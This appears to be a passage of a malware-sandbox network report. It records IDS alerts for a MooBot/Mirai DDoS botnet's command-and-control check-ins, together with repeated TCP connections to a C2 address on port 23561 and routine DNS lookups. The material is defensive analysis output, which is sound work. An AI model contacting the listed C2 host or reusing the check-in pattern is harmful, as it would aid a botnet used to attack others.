                                                  2024-10-07T16:25:53.596712+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235660891.200.103.11723561TCP
                                                  2024-10-07T16:25:56.333906+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235661091.200.103.11723561TCP
                                                  2024-10-07T16:26:01.070195+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235661291.200.103.11723561TCP
                                                  2024-10-07T16:26:04.700190+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235661491.200.103.11723561TCP
                                                  2024-10-07T16:26:12.530708+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235661691.200.103.11723561TCP
                                                  2024-10-07T16:26:24.677863+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235661891.200.103.11723561TCP
                                                  2024-10-07T16:26:33.331143+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235662091.200.103.11723561TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 7, 2024 16:23:05.338433981 CEST43928443192.168.2.2391.189.91.42
                                                  Oct 7, 2024 16:23:05.963797092 CEST5656023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:05.968647003 CEST235615656091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:05.968791962 CEST5656023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:06.006561041 CEST5656023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:06.011523962 CEST235615656091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:07.385986090 CEST4251680192.168.2.23109.202.202.202
                                                  Oct 7, 2024 16:23:07.582143068 CEST235615656091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:07.582483053 CEST5656023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:07.587373018 CEST235615656091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:10.970258951 CEST42836443192.168.2.2391.189.91.43
                                                  Oct 7, 2024 16:23:15.597647905 CEST5656223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:15.602586985 CEST235615656291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:15.602638960 CEST5656223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:15.603353977 CEST5656223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:15.608253956 CEST235615656291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:17.221467972 CEST235615656291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:17.221698999 CEST5656223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:17.226589918 CEST235615656291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:26.240916967 CEST5656423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:26.245819092 CEST235615656491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:26.245882988 CEST5656423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:26.246510983 CEST5656423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:26.251293898 CEST235615656491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:27.095343113 CEST43928443192.168.2.2391.189.91.42
                                                  Oct 7, 2024 16:23:27.882877111 CEST235615656491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:27.883162975 CEST5656423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:27.888154984 CEST235615656491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:28.893148899 CEST5656623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:28.898164034 CEST235615656691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:28.898231030 CEST5656623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:28.899112940 CEST5656623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:28.904042006 CEST235615656691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:30.598455906 CEST235615656691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:30.598676920 CEST5656623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:30.603494883 CEST235615656691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:33.609483957 CEST5656823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:33.614348888 CEST235615656891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:33.614407063 CEST5656823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:33.615422964 CEST5656823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:33.620274067 CEST235615656891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:35.334022045 CEST235615656891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:35.334263086 CEST5656823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:35.339077950 CEST235615656891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:37.333822012 CEST42836443192.168.2.2391.189.91.43
                                                  Oct 7, 2024 16:23:37.333830118 CEST4251680192.168.2.23109.202.202.202
                                                  Oct 7, 2024 16:23:44.346776009 CEST5657023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:44.352380037 CEST235615657091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:44.352427006 CEST5657023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:44.353615999 CEST5657023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:44.358658075 CEST235615657091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:46.061207056 CEST235615657091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:46.061374903 CEST5657023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:46.066328049 CEST235615657091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:52.071147919 CEST5657223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:52.076123953 CEST235615657291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:52.076176882 CEST5657223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:52.077181101 CEST5657223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:52.082027912 CEST235615657291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:53.694200993 CEST235615657291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:23:53.694356918 CEST5657223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:23:53.699290037 CEST235615657291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:00.703130007 CEST5657423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:00.707986116 CEST235615657491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:00.708039045 CEST5657423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:00.708676100 CEST5657423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:00.713541031 CEST235615657491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:02.338442087 CEST235615657491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:02.338560104 CEST5657423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:02.343422890 CEST235615657491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:03.347167969 CEST5657623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:03.352456093 CEST235615657691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:03.352502108 CEST5657623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:03.353037119 CEST5657623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:03.357883930 CEST235615657691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:04.978022099 CEST235615657691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:04.978156090 CEST5657623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:04.983032942 CEST235615657691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:08.049647093 CEST43928443192.168.2.2391.189.91.42
                                                  Oct 7, 2024 16:24:08.987142086 CEST5657823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:08.992135048 CEST235615657891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:08.992185116 CEST5657823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:08.992696047 CEST5657823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:08.997613907 CEST235615657891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:10.600086927 CEST235615657891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:10.600461006 CEST5657823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:10.605460882 CEST235615657891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:19.609915018 CEST5658023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:19.615041971 CEST235615658091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:19.615144968 CEST5658023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:19.616535902 CEST5658023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:19.621351957 CEST235615658091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:21.245807886 CEST235615658091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:21.245959997 CEST5658023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:21.250754118 CEST235615658091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:25.749232054 CEST5658223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:25.754163980 CEST235615658291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:25.754209995 CEST5658223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:25.754808903 CEST5658223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:25.759591103 CEST235615658291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:27.366318941 CEST235615658291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:27.366595984 CEST5658223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:27.371452093 CEST235615658291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:28.381486893 CEST5658423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:28.386385918 CEST235615658491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:28.386437893 CEST5658423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:28.387053967 CEST5658423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:28.392574072 CEST235615658491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:30.013648987 CEST235615658491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:30.014396906 CEST5658423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:30.019208908 CEST235615658491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:39.022304058 CEST5658623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:39.027501106 CEST235615658691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:39.027546883 CEST5658623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:39.028065920 CEST5658623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:39.032908916 CEST235615658691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:40.673238039 CEST235615658691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:40.673464060 CEST5658623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:40.678291082 CEST235615658691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:50.682543993 CEST5658823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:50.687376022 CEST235615658891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:50.687427998 CEST5658823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:50.688280106 CEST5658823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:50.693137884 CEST235615658891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:52.306528091 CEST235615658891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:52.306704044 CEST5658823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:52.311553955 CEST235615658891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:58.314935923 CEST5659023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:58.319789886 CEST235615659091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:58.319839001 CEST5659023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:58.320979118 CEST5659023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:58.325877905 CEST235615659091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:59.993709087 CEST235615659091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:24:59.993837118 CEST5659023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:24:59.998640060 CEST235615659091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:09.002621889 CEST5659223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:09.008477926 CEST235615659291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:09.008542061 CEST5659223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:09.009078026 CEST5659223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:09.014004946 CEST235615659291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:10.665771961 CEST235615659291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:10.665937901 CEST5659223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:10.670861959 CEST235615659291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:14.674128056 CEST5659423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:14.679020882 CEST235615659491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:14.679058075 CEST5659423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:14.679682016 CEST5659423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:14.684612989 CEST235615659491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:16.291503906 CEST235615659491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:16.291924953 CEST5659423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:16.297570944 CEST235615659491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:17.300394058 CEST5659623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:17.305533886 CEST235615659691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:17.305589914 CEST5659623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:17.306127071 CEST5659623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:17.311537027 CEST235615659691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:18.948738098 CEST235615659691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:18.948894978 CEST5659623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:18.953865051 CEST235615659691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:21.958378077 CEST5659823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:21.963857889 CEST235615659891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:21.963921070 CEST5659823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:21.964504004 CEST5659823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:21.969494104 CEST235615659891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:23.573031902 CEST235615659891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:23.573173046 CEST5659823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:23.578104973 CEST235615659891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:32.581286907 CEST5660023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:32.586148977 CEST235615660091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:32.586226940 CEST5660023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:32.586940050 CEST5660023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:32.591772079 CEST235615660091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:34.197911024 CEST235615660091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:34.198024988 CEST5660023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:34.202879906 CEST235615660091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:38.209258080 CEST5660223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:38.214381933 CEST235615660291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:38.214441061 CEST5660223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:38.215037107 CEST5660223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:38.219894886 CEST235615660291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:40.056545019 CEST235615660291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:40.056739092 CEST5660223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:40.061912060 CEST235615660291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:44.065862894 CEST5660423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:44.071105003 CEST235615660491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:44.071147919 CEST5660423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:44.071975946 CEST5660423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:44.076880932 CEST235615660491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:45.705260992 CEST235615660491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:45.705435038 CEST5660423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:45.710751057 CEST235615660491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:50.912399054 CEST5660623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:50.917380095 CEST235615660691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:50.917421103 CEST5660623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:51.092735052 CEST5660623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:51.097917080 CEST235615660691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:52.563549042 CEST235615660691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:52.563811064 CEST5660623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:52.568839073 CEST235615660691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:53.591182947 CEST5660823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:53.596049070 CEST235615660891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:53.596128941 CEST5660823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:53.596712112 CEST5660823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:53.602639914 CEST235615660891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:55.318837881 CEST235615660891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:55.319041014 CEST5660823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:55.324223995 CEST235615660891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:56.328387022 CEST5661023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:56.333328009 CEST235615661091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:56.333411932 CEST5661023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:56.333905935 CEST5661023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:56.338902950 CEST235615661091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:57.951781988 CEST235615661091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:25:57.951996088 CEST5661023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:25:57.956962109 CEST235615661091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:01.064595938 CEST5661223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:01.069505930 CEST235615661291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:01.069582939 CEST5661223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:01.070194960 CEST5661223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:01.075016975 CEST235615661291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:02.684840918 CEST235615661291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:02.684984922 CEST5661223561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:02.690722942 CEST235615661291.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:04.694498062 CEST5661423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:04.699512959 CEST235615661491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:04.699691057 CEST5661423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:04.700190067 CEST5661423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:04.704958916 CEST235615661491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:06.507565975 CEST235615661491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:06.507716894 CEST5661423561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:06.512618065 CEST235615661491.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:12.525083065 CEST5661623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:12.530083895 CEST235615661691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:12.530145884 CEST5661623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:12.530708075 CEST5661623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:12.535567045 CEST235615661691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:14.252685070 CEST235615661691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:14.252839088 CEST5661623561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:14.257863998 CEST235615661691.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:24.671987057 CEST5661823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:24.677141905 CEST235615661891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:24.677213907 CEST5661823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:24.677862883 CEST5661823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:24.682676077 CEST235615661891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:26.311624050 CEST235615661891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:26.311768055 CEST5661823561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:26.316596985 CEST235615661891.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:33.323267937 CEST5662023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:33.330564976 CEST235615662091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:33.330637932 CEST5662023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:33.331142902 CEST5662023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:33.338850021 CEST235615662091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:34.953150988 CEST235615662091.200.103.117192.168.2.23
                                                  Oct 7, 2024 16:26:34.953306913 CEST5662023561192.168.2.2391.200.103.117
                                                  Oct 7, 2024 16:26:34.960324049 CEST235615662091.200.103.117192.168.2.23
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 7, 2024 16:23:05.947390079 CEST5650653192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:05.959692001 CEST53565068.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:15.585419893 CEST5336253192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:15.595879078 CEST53533628.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:26.233362913 CEST3974553192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:26.240405083 CEST53397458.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:28.885267973 CEST4836853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:28.892528057 CEST53483688.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:33.601608038 CEST4945153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:33.608918905 CEST53494518.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:44.335958958 CEST3339853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:44.346298933 CEST53333988.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:23:52.063297987 CEST3715353192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:23:52.070578098 CEST53371538.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:00.695106983 CEST4587853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:00.702564955 CEST53458788.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:03.340233088 CEST4792553192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:03.346813917 CEST53479258.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:08.979034901 CEST5145153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:08.986745119 CEST53514518.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:19.602272987 CEST3791753192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:19.609518051 CEST53379178.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:25.247142076 CEST3413853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:25.748636007 CEST53341388.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:28.368073940 CEST5380153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:28.380978107 CEST53538018.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:39.014631987 CEST4091653192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:39.021981955 CEST53409168.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:50.673736095 CEST5265553192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:50.680771112 CEST53526558.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:24:58.307435036 CEST3508653192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:24:58.314532995 CEST53350868.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:08.994214058 CEST4875653192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:09.002285957 CEST53487568.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:14.666665077 CEST3517453192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:14.673780918 CEST53351748.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:17.293072939 CEST4983853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:17.299966097 CEST53498388.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:21.950159073 CEST3709053192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:21.958036900 CEST53370908.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:32.573446989 CEST5765953192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:32.580842972 CEST53576598.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:38.199171066 CEST4749253192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:38.208892107 CEST53474928.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:44.058237076 CEST3668653192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:44.065411091 CEST53366868.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:50.858520985 CEST5864353192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:50.865180969 CEST53586438.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:53.583554983 CEST4722153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:53.590786934 CEST53472218.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:25:56.320736885 CEST3662853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:25:56.327975988 CEST53366288.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:26:00.953061104 CEST4754153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:26:01.064019918 CEST53475418.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:26:04.686326027 CEST4705153192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:26:04.694154978 CEST53470518.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:26:12.516211987 CEST5235853192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:26:12.524727106 CEST53523588.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:26:24.252969027 CEST4648453192.168.2.238.8.8.8
                                                  Oct 7, 2024 16:26:24.671441078 CEST53464848.8.8.8192.168.2.23
                                                  Oct 7, 2024 16:26:33.312412977 CEST4391653192.168.2.238.8.8.8
